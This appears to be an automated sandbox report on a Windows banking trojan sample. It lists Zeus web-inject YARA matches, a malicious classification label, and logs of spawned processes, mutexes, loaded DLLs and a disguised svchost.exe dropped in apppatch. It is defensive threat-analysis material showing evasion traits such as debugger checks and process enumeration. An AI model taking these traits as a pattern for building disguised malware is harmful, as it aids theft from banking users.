Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6988, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6968, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6944, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6920, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6896, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: JbrLYfXaOpqnSngA.exe PID: 6876, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04

Source: classification engine

Classification label: mal100.bank.troj.spyw.expl.evad.winEXE@117/43@2385/28

Source: C:\Users\user\Desktop\Bonelessness.exe

Code function: 0_2_00401000 IsDebuggerPresent,FindWindowA,memset,CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,StrStrIA,Process32Next,GetHandleInformation,FindCloseChangeNotification,PathFileExistsA,

0_2_00401000

Source: C:\Users\user\Desktop\Bonelessness.exe

Code function: 0_2_00402660 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,

0_2_00402660

Source: C:\Windows\apppatch\svchost.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\login[1].htm

Jump to behavior

Source: C:\Windows\apppatch\svchost.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:7984:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6260
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7140
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:2060:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:7976:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:7672:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:7780:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:5600:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:3912:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:7576:64:WilError_03
Source: C:\Windows\apppatch\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\A1633C6Ba
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3496
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:6064:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:7772:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:3808:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:7092:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:7684:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:8100:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6216
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:3468:64:WilError_03

Source: C:\Users\user\Desktop\Bonelessness.exe

File created: C:\Users\user\AppData\Local\Temp\5FC5.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Bonelessness.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Bonelessness.exe

ReversingLabs: Detection: 95%

Source: Bonelessness.exe	String found in binary or memory: -help
Source: svchost.exe	String found in binary or memory: -help

Source: C:\Users\user\Desktop\Bonelessness.exe

File read: C:\Users\user\Desktop\Bonelessness.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Bonelessness.exe "C:\Users\user\Desktop\Bonelessness.exe"
Source: C:\Users\user\Desktop\Bonelessness.exe	Process created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6216 -ip 6216
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6260 -ip 6260
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 800
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 732
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3496 -ip 3496
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 748
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7140 -ip 7140
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 760
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7124 -ip 7124
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7088 -ip 7088
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7064 -ip 7064
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7040 -ip 7040
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7024 -ip 7024
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 7008 -ip 7008
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6988 -ip 6988
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6968 -ip 6968
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 6944 -ip 6944
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6920 -ip 6920
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6896 -ip 6896
Source: C:\Users\user\Desktop\Bonelessness.exe	Process created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6216 -ip 6216	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6260 -ip 6260	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 800	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 732	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3496 -ip 3496	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 748	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7140 -ip 7140	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 760	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7124 -ip 7124	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7088 -ip 7088	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7064 -ip 7064	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7040 -ip 7040	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7024 -ip 7024	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 7008 -ip 7008	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6988 -ip 6988	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6968 -ip 6968	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 6944 -ip 6944	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6920 -ip 6920	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6896 -ip 6896	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6988 -ip 6988	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7088 -ip 7088	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7140 -ip 7140	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7124 -ip 7124	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: inetcomm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: inetres.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: inetcomm.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: inetres.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: sensapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
